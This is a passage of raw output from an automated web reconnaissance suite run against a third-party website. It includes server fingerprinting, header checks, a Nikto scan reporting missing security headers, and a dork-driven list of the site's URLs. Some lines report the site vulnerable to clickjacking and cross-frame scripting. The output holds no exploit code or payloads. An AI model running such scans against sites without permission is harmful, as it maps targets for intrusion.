  673. http://illuminatiofficial.org [301 Moved Permanently] CloudFlare, Cookies[PHPSESSID,__cfduid], Country[UNITED STATES][US], HTTPServer[cloudflare-nginx], HttpOnly[__cfduid], IP[104.24.31.26], RedirectLocation[https://www.illuminatiofficial.org/], UncommonHeaders[x-kinsta-cache,x-content-type-options,cf-ray], X-Powered-By[HHVM/3.23.2]
  674. https://www.illuminatiofficial.org/ [200 OK] CloudFlare, Cookies[PHPSESSID,__cfduid], Country[UNITED STATES][US], Frame, Google-Analytics[Universal][UA-44625461-1,UA-93058433-1], HTML5, HTTPServer[cloudflare-nginx], HttpOnly[__cfduid], IP[104.24.31.26], JQuery[1.12.4], MetaGenerator[MasterSlider 3.0.4 - Responsive Touch Image Slider,Powered by Visual Composer - drag and drop page builder for WordPress.,WordPress 4.7.8,jupiter 5.0.9], Open-Graph-Protocol[article], PoweredBy[Visual], Script[application/ld+json,text/javascript], Title[Illuminati Official Website - IlluminatiOfficial.org | Contact or Join], UncommonHeaders[link,x-kinsta-cache,x-content-type-options,cf-ray], WordPress[4.7.8], X-Powered-By[HHVM/3.23.2], X-UA-Compatible[IE=edge], YouTube
  675.  
  676.  __ ______ _____ 
  677.  \ \/ / ___|_ _|
  678.  \ /\___ \ | | 
  679.  / \ ___) || | 
  680.  /_/\_|____/ |_| 
  681.  
  682. + -- --=[Cross-Site Tracer v1.3 by 1N3 @ CrowdShield
  683. + -- --=[Target: illuminatiofficial.org:80
  684. + -- --=[Site not vulnerable to Cross-Site Tracing!
  685. + -- --=[Site not vulnerable to Host Header Injection!
  686. + -- --=[Site vulnerable to Cross-Frame Scripting!
  687. + -- --=[Site vulnerable to Clickjacking!
  688.  
  689. HTTP/1.1 405 Not Allowed
  690. Date: Fri, 05 Jan 2018 02:57:52 GMT
  691. Content-Type: text/html
  692. Content-Length: 177
  693. Connection: close
  694. Server: cloudflare-nginx
  695. CF-RAY: -
  696.  
  697. <html>
  698. <head><title>405 Not Allowed</title></head>
  699. <body bgcolor="white">
  700. <center><h1>405 Not Allowed</h1></center>
  701. <hr><center>cloudflare-nginx</center>
  702. </body>
  703. </html>
  704. 
  705. HTTP/1.1 301 Moved Permanently
  706. Date: Fri, 05 Jan 2018 02:57:53 GMT
  707. Content-Type: text/html; charset=UTF-8
  708. Transfer-Encoding: chunked
  709. Connection: keep-alive
  710. Set-Cookie: __cfduid=d8402fe4156ce37896ef525d36b07e3231515121073; expires=Sat, 05-Jan-19 02:57:53 GMT; path=/; domain=.illuminatiofficial.org; HttpOnly
  711. X-Powered-By: HHVM/3.23.2
  712. Set-Cookie: PHPSESSID=c933396b505dbd14307afe94c51bcc7b; path=/
  713. Expires: Thu, 19 Nov 1981 08:52:00 GMT
  714. Location: https://www.illuminatiofficial.org/
  715. Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
  716. Pragma: no-cache
  717. X-Kinsta-Cache: HIT
  718. X-Content-Type-Options: nosniff
  719. Server: cloudflare-nginx
  720. CF-RAY: 3d832c32d11a3c65-CDG
  721.  
  722. 
  723.  
  724.  
  725.  
  726.  + -- ----------------------------=[Checking HTTP Headers]=------------------- -- +
  727. + -- --=[Checking if X-Content options are enabled on illuminatiofficial.org... 
  728. X-Content-Type-Options: nosniff
  729.  
  730. + -- --=[Checking if X-Frame options are enabled on illuminatiofficial.org... 
  731.  
  732. + -- --=[Checking if X-XSS-Protection header is enabled on illuminatiofficial.org... 
  733.  
  734. + -- --=[Checking HTTP methods on illuminatiofficial.org... 
  735. HTTP/1.1 405 Not Allowed
  736.  
  737. + -- --=[Checking if TRACE method is enabled on illuminatiofficial.org... 
  738.  
  739. + -- --=[Checking for META tags on illuminatiofficial.org... 
  740.  
  741. + -- --=[Checking for open proxy on illuminatiofficial.org... 
  742. </div><!-- /#cf-wrapper -->
  743.  
  744. <script type="text/javascript">
  745. window._cf_translation = {};
  746.  
  747.  
  748. </script>
  749.  
  750. </body>
  751. </html>
  752.  
  753. + -- --=[Enumerating software on illuminatiofficial.org... 
  754. X-Powered-By: HHVM/3.23.2
  755. Set-Cookie: PHPSESSID=5dbb802c739efddc45d30f72a48828a8; path=/
  756. Server: cloudflare-nginx
  757.  
  758. + -- --=[Checking if Strict-Transport-Security is enabled on illuminatiofficial.org... 
  759.  
  760. + -- --=[Checking for Flash cross-domain policy on illuminatiofficial.org... 
  761.  
  762. + -- --=[Checking for Silverlight cross-domain policy on illuminatiofficial.org... 
  763.  
  764. + -- --=[Checking for HTML5 cross-origin resource sharing on illuminatiofficial.org... 
  765.  
  766. + -- --=[Retrieving robots.txt on illuminatiofficial.org... 
  767. User-agent: *
  768. Disallow: /wp-admin/
  769. Allow: /wp-admin/admin-ajax.php
  770.  
  771. + -- --=[Retrieving sitemap.xml on illuminatiofficial.org... 
  772.  
  773. + -- --=[Checking cookie attributes on illuminatiofficial.org... 
  774. Set-Cookie: __cfduid=d046e14fb0e5c54b73155c88b480abdbc1515121081; expires=Sat, 05-Jan-19 02:58:01 GMT; path=/; domain=.illuminatiofficial.org; HttpOnly
  775. Set-Cookie: PHPSESSID=5dbb802c739efddc45d30f72a48828a8; path=/
  776.  
  777. + -- --=[Checking for ASP.NET Detailed Errors on illuminatiofficial.org... 
  778. <body class="error404 loading _masterslider _msp_version_3.0.4 wpb-js-composer js-comp-ver-5.0.1 vc_responsive" itemscope="itemscope" itemtype="https://schema.org/WebPage" data-adminbar="">
  779.  
  780. 
  781.  + -- ----------------------------=[Running Web Vulnerability Scan]=---------- -- +
  782. - Nikto v2.1.6
  783. ---------------------------------------------------------------------------
  784. + Target IP: 104.24.31.26
  785. + Target Hostname: illuminatiofficial.org
  786. + Target Port: 80
  787. + Start Time: 2018-01-04 21:58:11 (GMT-5)
  788. ---------------------------------------------------------------------------
  789. + Server: cloudflare-nginx
  790. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
  791. + Uncommon header 'cf-ray' found, with contents: 3d832ca7d6353c05-CDG
  792. + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
  793. + All CGI directories 'found', use '-C none' to test none
  794. + 26097 requests: 0 error(s) and 3 item(s) reported on remote host
  795. + End Time: 2018-01-04 23:52:31 (GMT-5) (6860 seconds)
  796. ---------------------------------------------------------------------------
  797. + 1 host(s) tested
  798.  + -- ----------------------------=[Saving Web Screenshots]=------------------ -- +
  799. [+] Screenshot saved to /usr/share/sniper/loot/screenshots/illuminatiofficial.org-port80.jpg
  800.  + -- ----------------------------=[Running Google Hacking Queries]=--------------------- -- +
  801.  + -- ----------------------------=[Running InUrlBR OSINT Queries]=---------- -- +
  802.  
  803.  _____  .701F. .iBR. .7CL. .70BR. .7BR. .7BR'''Cq. .70BR. .1BR'''Yp, .8BR'''Cq.
  804.  (_____) 01 01N. C 01 C 01 .01. 01  01 Yb 01 .01.
  805.  (() ()) 01 C YCb C 01 C 01 ,C9 01  01 dP 01 ,C9
  806.  \ /  01 C .CN. C 01 C 0101dC9 01  01'''bg. 0101dC9
  807.  \ /  01 C .01.C 01 C 01 YC. 01 ,  01 .Y 01 YC.
  808.  /=\  01 C Y01 YC. ,C 01 .Cb. 01 ,C  01 ,9 01 .Cb.
  809.  [___]  .J01L. .JCL. YC .b0101d'. .J01L. .J01. .J01010101C .J0101Cd9 .J01L. .J01./ 2.1
  810.  
  811. __[ ! ] Neither war between hackers, nor peace for the system.
  812. __[ ! ] http://blog.inurl.com.br
  813. __[ ! ] http://fb.com/InurlBrasil
  814. __[ ! ] http://twitter.com/@googleinurl
  815. __[ ! ] http://github.com/googleinurl
  816. __[ ! ] Current PHP version::[ 7.0.26-1 ]
  817. __[ ! ] Current script owner::[ root ]
  818. __[ ! ] Current uname::[ Linux Kali 4.14.0-kali1-amd64 #1 SMP Debian 4.14.2-1kali1 (2017-12-04) x86_64 ]
  819. __[ ! ] Current pwd::[ /usr/share/sniper ]
  820. __[ ! ] Help: php inurlbr.php --help
  821. ------------------------------------------------------------------------------------------------------------------------
  822.  
  823. [ ! ] Starting SCANNER INURLBR 2.1 at [04-01-2018 23:53:22]
  824. [ ! ] legal disclaimer: Usage of INURLBR for attacking targets without prior mutual consent is illegal.
  825. It is the end user's responsibility to obey all applicable local, state and federal laws.
  826. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  827.  
  828. [ INFO ][ OUTPUT FILE ]:: [ /usr/share/sniper/output/inurlbr-illuminatiofficial.org.txt ]
  829. [ INFO ][ DORK ]::[ site:illuminatiofficial.org ]
  830. [ INFO ][ SEARCHING ]:: {
  831. [ INFO ][ ENGINE ]::[ GOOGLE - www.google.com.ni ]
  832.  
  833. [ INFO ][ SEARCHING ]:: 
  834. -[:::]
  835. [ INFO ][ ENGINE ]::[ GOOGLE API ]
  836.  
  837. [ INFO ][ SEARCHING ]:: 
  838. -[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
  839. [ INFO ][ ENGINE ]::[ GOOGLE_GENERIC_RANDOM - www.google.sh ID: 012984904789461885316:oy3-mu17hxk ]
  840.  
  841. [ INFO ][ SEARCHING ]:: 
  842. -[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
  843.  
  844. [ INFO ][ TOTAL FOUND VALUES ]:: [ 100 ]
  845.  
  846. 
  847.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  848. |_[ + ] [ 0 / 100 ]-[23:53:33] [ - ] 
  849. |_[ + ] Target:: [ https://www.illuminatiofficial.org/ ]
  850. |_[ + ] Exploit:: 
  851. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: HHVM/3.23.2, IP:2400:cb00:2048:1::6818:1e1a:443 
  852. |_[ + ] More details:: 
  853. |_[ + ] Found:: UNIDENTIFIED
  854. 
  855.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  856. |_[ + ] [ 1 / 100 ]-[23:53:33] [ - ] 
  857. |_[ + ] Target:: [ https://www.illuminatiofficial.org/videos/ ]
  858. |_[ + ] Exploit:: 
  859. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: HHVM/3.23.2, IP:2400:cb00:2048:1::6818:1e1a:443 
  860. |_[ + ] More details:: 
  861. |_[ + ] Found:: UNIDENTIFIED
  862. 
  863.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  864. |_[ + ] [ 2 / 100 ]-[23:53:33] [ - ] 
  865. |_[ + ] Target:: [ https://www.illuminatiofficial.org/verified/ ]
  866. |_[ + ] Exploit:: 
  867. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: HHVM/3.23.2, IP:2400:cb00:2048:1::6818:1e1a:443 
  868. |_[ + ] More details:: 
  869. |_[ + ] Found:: UNIDENTIFIED
  870. 
  871.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  872. |_[ + ] [ 3 / 100 ]-[23:53:34] [ - ] 
  873. |_[ + ] Target:: [ https://www.illuminatiofficial.org/illuminatiam/ ]
  874. |_[ + ] Exploit:: 
  875. |_[ + ] Information Server:: HTTP/1.1 301 Moved Permanently, Server: cloudflare-nginx X-Powered-By: HHVM/3.23.2, IP:2400:cb00:2048:1::6818:1e1a:443 
  876. |_[ + ] More details:: 
  877. |_[ + ] Found:: UNIDENTIFIED
  878. 
  879.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  880. |_[ + ] [ 4 / 100 ]-[23:53:34] [ - ] 
  881. |_[ + ] Target:: [ https://www.illuminatiofficial.org/illuvideos/ ]
  882. |_[ + ] Exploit:: 
  883. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: HHVM/3.23.2, IP:2400:cb00:2048:1::6818:1e1a:443 
  884. |_[ + ] More details:: 
  885. |_[ + ] Found:: UNIDENTIFIED
  886. 
  887.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  888. |_[ + ] [ 5 / 100 ]-[23:53:34] [ - ] 
  889. |_[ + ] Target:: [ https://www.illuminatiofficial.org/talisman/ ]
  890. |_[ + ] Exploit:: 
  891. |_[ + ] Information Server:: HTTP/1.1 301 Moved Permanently, Server: cloudflare-nginx X-Powered-By: HHVM/3.23.2, IP:2400:cb00:2048:1::6818:1e1a:443 
  892. |_[ + ] More details:: 
  893. |_[ + ] Found:: UNIDENTIFIED
  894. 
  895.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  896. |_[ + ] [ 6 / 100 ]-[23:53:34] [ - ] 
  897. |_[ + ] Target:: [ https://www.illuminatiofficial.org/join/ ]
  898. |_[ + ] Exploit:: 
  899. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: HHVM/3.23.2, IP:2400:cb00:2048:1::6818:1e1a:443 
  900. |_[ + ] More details:: 
  901. |_[ + ] Found:: UNIDENTIFIED
  902. 
  903.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  904. |_[ + ] [ 7 / 100 ]-[23:53:35] [ - ] 
  905. |_[ + ] Target:: [ https://www.illuminatiofficial.org/sc3/ ]
  906. |_[ + ] Exploit:: 
  907. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: HHVM/3.23.2, IP:2400:cb00:2048:1::6818:1e1a:443 
  908. |_[ + ] More details:: 
  909. |_[ + ] Found:: UNIDENTIFIED
  910. 
  911.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  912. |_[ + ] [ 8 / 100 ]-[23:53:36] [ - ] 
  913. |_[ + ] Target:: [ https://www.illuminatiofficial.org/stage/ ]
  914. |_[ + ] Exploit:: 
  915. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: HHVM/3.23.2, IP:2400:cb00:2048:1::6818:1e1a:443 
  916. |_[ + ] More details:: 
  917. |_[ + ] Found:: UNIDENTIFIED
  918. 
  919.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  920. |_[ + ] [ 9 / 100 ]-[23:53:36] [ - ] 
  921. |_[ + ] Target:: [ https://www.illuminatiofficial.org/11/ ]
  922. |_[ + ] Exploit:: 
  923. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: HHVM/3.23.2, IP:2400:cb00:2048:1::6818:1e1a:443 
  924. |_[ + ] More details:: 
  925. |_[ + ] Found:: UNIDENTIFIED
  926. 
  927.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  928. |_[ + ] [ 10 / 100 ]-[23:53:36] [ - ] 
  929. |_[ + ] Target:: [ https://www.illuminatiofficial.org/books/ ]
  930. |_[ + ] Exploit:: 
  931. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: HHVM/3.23.2, IP:2400:cb00:2048:1::6818:1e1a:443 
  932. |_[ + ] More details:: 
  933. |_[ + ] Found:: UNIDENTIFIED
  934. 
  935.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  936. |_[ + ] [ 11 / 100 ]-[23:53:37] [ - ] 
  937. |_[ + ] Target:: [ https://www.illuminatiofficial.org/change4us/ ]
  938. |_[ + ] Exploit:: 
  939. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: HHVM/3.23.2, IP:2400:cb00:2048:1::6818:1e1a:443 
  940. |_[ + ] More details:: 
  941. |_[ + ] Found:: UNIDENTIFIED
  942. 
  943.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  944. |_[ + ] [ 12 / 100 ]-[23:53:37] [ - ] 
  945. |_[ + ] Target:: [ https://www.illuminatiofficial.org/sc7/ ]
  946. |_[ + ] Exploit:: 
  947. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: HHVM/3.23.2, IP:2400:cb00:2048:1::6818:1e1a:443 
  948. |_[ + ] More details:: 
  949. |_[ + ] Found:: UNIDENTIFIED
  950. 
  951.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  952. |_[ + ] [ 13 / 100 ]-[23:53:37] [ - ] 
  953. |_[ + ] Target:: [ https://www.illuminatiofficial.org/sc1/ ]
  954. |_[ + ] Exploit:: 
  955. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: HHVM/3.23.2, IP:2400:cb00:2048:1::6818:1e1a:443 
  956. |_[ + ] More details:: 
  957. |_[ + ] Found:: UNIDENTIFIED
  958. 
  959.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  960. |_[ + ] [ 14 / 100 ]-[23:53:37] [ - ] 
  961. |_[ + ] Target:: [ https://www.illuminatiofficial.org/tools/ ]
  962. |_[ + ] Exploit:: 
  963. |_[ + ] Information Server:: HTTP/1.1 301 Moved Permanently, Server: cloudflare-nginx X-Powered-By: HHVM/3.23.2, IP:2400:cb00:2048:1::6818:1e1a:443 
  964. |_[ + ] More details:: 
  965. |_[ + ] Found:: UNIDENTIFIED
  966. 
  967.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  968. |_[ + ] [ 15 / 100 ]-[23:53:38] [ - ] 
  969. |_[ + ] Target:: [ https://www.illuminatiofficial.org/51/ ]
  970. |_[ + ] Exploit:: 
  971. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: HHVM/3.23.2, IP:2400:cb00:2048:1::6818:1e1a:443 
  972. |_[ + ] More details:: 
  973. |_[ + ] Found:: UNIDENTIFIED
  974. 
  975.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  976. |_[ + ] [ 16 / 100 ]-[23:53:38] [ - ] 
  977. |_[ + ] Target:: [ https://www.illuminatiofficial.org/sc6/ ]
  978. |_[ + ] Exploit:: 
  979. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: HHVM/3.23.2, IP:2400:cb00:2048:1::6818:1e1a:443 
  980. |_[ + ] More details:: 
  981. |_[ + ] Found:: UNIDENTIFIED
  982. 
  983.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  984. |_[ + ] [ 17 / 100 ]-[23:53:39] [ - ] 
  985. |_[ + ] Target:: [ https://www.illuminatiofficial.org/project115/ ]
  986. |_[ + ] Exploit:: 
  987. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: HHVM/3.23.2, IP:2400:cb00:2048:1::6818:1e1a:443 
  988. |_[ + ] More details:: 
  989. |_[ + ] Found:: UNIDENTIFIED
  990. 
  991.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  992. |_[ + ] [ 18 / 100 ]-[23:53:39] [ - ] 
  993. |_[ + ] Target:: [ https://www.illuminatiofficial.org/41/ ]
  994. |_[ + ] Exploit:: 
  995. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: HHVM/3.23.2, IP:2400:cb00:2048:1::6818:1e1a:443 
  996. |_[ + ] More details:: 
  997. |_[ + ] Found:: UNIDENTIFIED
  998. 
  999.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  1000. |_[ + ] [ 19 / 100 ]-[23:53:39] [ - ] 
  1001. |_[ + ] Target:: [ https://www.illuminatiofficial.org/membership/ ]
  1002. |_[ + ] Exploit:: 
  1003. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: HHVM/3.23.2, IP:2400:cb00:2048:1::6818:1e1a:443 
  1004. |_[ + ] More details:: 
  1005. |_[ + ] Found:: UNIDENTIFIED
  1006. 
  1007.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  1008. |_[ + ] [ 20 / 100 ]-[23:53:40] [ - ] 
  1009. |_[ + ] Target:: [ https://www.illuminatiofficial.org/sc2/ ]
  1010. |_[ + ] Exploit:: 
  1011. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: HHVM/3.23.2, IP:2400:cb00:2048:1::6818:1e1a:443 
  1012. |_[ + ] More details:: 
  1013. |_[ + ] Found:: UNIDENTIFIED
  1014. 
  1015.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  1016. |_[ + ] [ 21 / 100 ]-[23:53:40] [ - ] 
  1017. |_[ + ] Target:: [ https://www.illuminatiofficial.org/sc5/ ]
  1018. |_[ + ] Exploit:: 
  1019. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: HHVM/3.23.2, IP:2400:cb00:2048:1::6818:1e1a:443 
  1020. |_[ + ] More details:: 
  1021. |_[ + ] Found:: UNIDENTIFIED
  1022. 
  1023.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  1024. |_[ + ] [ 22 / 100 ]-[23:53:41] [ - ] 
  1025. |_[ + ] Target:: [ https://www.illuminatiofficial.org/sc4/ ]
  1026. |_[ + ] Exploit:: 
  1027. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: HHVM/3.23.2, IP:2400:cb00:2048:1::6818:1e1a:443 
  1028. |_[ + ] More details:: 
  1029. |_[ + ] Found:: UNIDENTIFIED
  1030. 
  1031.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  1032. |_[ + ] [ 23 / 100 ]-[23:53:41] [ - ] 
  1033. |_[ + ] Target:: [ https://www.illuminatiofficial.org/31/ ]
  1034. |_[ + ] Exploit:: 
  1035. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: HHVM/3.23.2, IP:2400:cb00:2048:1::6818:1e1a:443 
  1036. |_[ + ] More details:: 
  1037. |_[ + ] Found:: UNIDENTIFIED
  1038. 
  1039.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  1040. |_[ + ] [ 24 / 100 ]-[23:53:41] [ - ] 
  1041. |_[ + ] Target:: [ https://www.illuminatiofficial.org/21/ ]
  1042. |_[ + ] Exploit:: 
  1043. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: HHVM/3.23.2, IP:2400:cb00:2048:1::6818:1e1a:443 
  1044. |_[ + ] More details:: 
  1045. |_[ + ] Found:: UNIDENTIFIED
  1046. 
  1047.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  1048. |_[ + ] [ 25 / 100 ]-[23:53:42] [ - ] 
  1049. |_[ + ] Target:: [ https://www.illuminatiofficial.org/privacy-policy/ ]
  1050. |_[ + ] Exploit:: 
  1051. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: HHVM/3.23.2, IP:2400:cb00:2048:1::6818:1e1a:443 
  1052. |_[ + ] More details:: 
  1053. |_[ + ] Found:: UNIDENTIFIED
  1054. 
  1055.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  1056. |_[ + ] [ 26 / 100 ]-[23:53:42] [ - ] 
  1057. |_[ + ] Target:: [ https://www.illuminatiofficial.org/messages/fear/ ]
  1058. |_[ + ] Exploit:: 
  1059. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: HHVM/3.23.2, IP:2400:cb00:2048:1::6818:1e1a:443 
  1060. |_[ + ] More details:: 
  1061. |_[ + ] Found:: UNIDENTIFIED
  1062. 
  1063.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  1064. |_[ + ] [ 27 / 100 ]-[23:53:42] [ - ] 
  1065. |_[ + ] Target:: [ https://www.illuminatiofficial.org/membership/artists/ ]
  1066. |_[ + ] Exploit:: 
  1067. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: HHVM/3.23.2, IP:2400:cb00:2048:1::6818:1e1a:443 
  1068. |_[ + ] More details:: 
  1069. |_[ + ] Found:: UNIDENTIFIED
  1070. 
  1071.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  1072. |_[ + ] [ 28 / 100 ]-[23:53:43] [ - ] 
  1073. |_[ + ] Target:: [ https://www.illuminatiofficial.org/messages/aug/ ]
  1074. |_[ + ] Exploit:: 
  1075. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: HHVM/3.23.2, IP:2400:cb00:2048:1::6818:1e1a:443 
  1076. |_[ + ] More details:: 
  1077. |_[ + ] Found:: UNIDENTIFIED
  1078. 
  1079.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  1080. |_[ + ] [ 29 / 100 ]-[23:53:43] [ - ] 
  1081. |_[ + ] Target:: [ https://www.illuminatiofficial.org/messages/god/ ]
  1082. |_[ + ] Exploit:: 
  1083. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: HHVM/3.23.2, IP:2400:cb00:2048:1::6818:1e1a:443 
  1084. |_[ + ] More details:: 
  1085. |_[ + ] Found:: UNIDENTIFIED
  1086. 
  1087.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  1088. |_[ + ] [ 30 / 100 ]-[23:53:44] [ - ] 
  1089. |_[ + ] Target:: [ https://www.illuminatiofficial.org/coreyz-illuminatiam/ ]
  1090. |_[ + ] Exploit:: 
  1091. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: HHVM/3.23.2, IP:2400:cb00:2048:1::6818:1e1a:443 
  1092. |_[ + ] More details:: 
  1093. |_[ + ] Found:: UNIDENTIFIED
  1094. 
  1095.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  1096. |_[ + ] [ 31 / 100 ]-[23:53:44] [ - ] 
  1097. |_[ + ] Target:: [ https://www.illuminatiofficial.org/buy-orange/ ]
  1098. |_[ + ] Exploit:: 
  1099. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: HHVM/3.23.2, IP:2400:cb00:2048:1::6818:1e1a:443 
  1100. |_[ + ] More details:: 
  1101. |_[ + ] Found:: UNIDENTIFIED
  1102. 
  1103.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  1104. |_[ + ] [ 32 / 100 ]-[23:53:44] [ - ] 
  1105. |_[ + ] Target:: [ https://www.illuminatiofficial.org/illuminati-wealth/ ]
  1106. |_[ + ] Exploit:: 
  1107. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: HHVM/3.23.2, IP:2400:cb00:2048:1::6818:1e1a:443 
  1108. |_[ + ] More details:: 
  1109. |_[ + ] Found:: UNIDENTIFIED
  1110. 
  1111.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  1112. |_[ + ] [ 33 / 100 ]-[23:53:45] [ - ] 
  1113. |_[ + ] Target:: [ https://www.illuminatiofficial.org/tonyr-illuminatiam/ ]
  1114. |_[ + ] Exploit:: 
  1115. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: HHVM/3.23.2, IP:2400:cb00:2048:1::6818:1e1a:443 
  1116. |_[ + ] More details:: 
  1117. |_[ + ] Found:: UNIDENTIFIED
  1118. 
  1119.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  1120. |_[ + ] [ 34 / 100 ]-[23:53:45] [ - ] 
  1121. |_[ + ] Target:: [ https://www.illuminatiofficial.org/illuminati-logo/ ]
  1122. |_[ + ] Exploit:: 
  1123. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: HHVM/3.23.2, IP:2400:cb00:2048:1::6818:1e1a:443 
  1124. |_[ + ] More details:: 
  1125. |_[ + ] Found:: UNIDENTIFIED
  1126. 
  1127.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  1128. |_[ + ] [ 35 / 100 ]-[23:53:45] [ - ] 
  1129. |_[ + ] Target:: [ https://www.illuminatiofficial.org/buy-green/ ]
  1130. |_[ + ] Exploit:: 
  1131. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: HHVM/3.23.2, IP:2400:cb00:2048:1::6818:1e1a:443 
  1132. |_[ + ] More details:: 
  1133. |_[ + ] Found:: UNIDENTIFIED
  1134. 
  1135.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  1136. |_[ + ] [ 36 / 100 ]-[23:53:46] [ - ] 
  1137. |_[ + ] Target:: [ https://www.illuminatiofficial.org/collinh-illuminatiam/ ]
  1138. |_[ + ] Exploit:: 
  1139. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: HHVM/3.23.2, IP:2400:cb00:2048:1::6818:1e1a:443 
  1140. |_[ + ] More details:: 
  1141. |_[ + ] Found:: UNIDENTIFIED
  1142. 
  1143.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  1144. |_[ + ] [ 37 / 100 ]-[23:53:46] [ - ] 
  1145. |_[ + ] Target:: [ https://www.illuminatiofficial.org/favicon-3/ ]
  1146. |_[ + ] Exploit:: 
  1147. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: HHVM/3.23.2, IP:2400:cb00:2048:1::6818:1e1a:443 
  1148. |_[ + ] More details:: 
  1149. |_[ + ] Found:: UNIDENTIFIED
  1150. 
  1151.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  1152. |_[ + ] [ 38 / 100 ]-[23:53:47] [ - ] 
  1153. |_[ + ] Target:: [ https://www.illuminatiofficial.org/timz-illuminatiam/ ]
  1154. |_[ + ] Exploit:: 
  1155. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: HHVM/3.23.2, IP:2400:cb00:2048:1::6818:1e1a:443 
  1156. |_[ + ] More details:: 
  1157. |_[ + ] Found:: UNIDENTIFIED
  1158. 
  1159.  _[ - ]::--------------------------------------------------------------------------------------------------------------
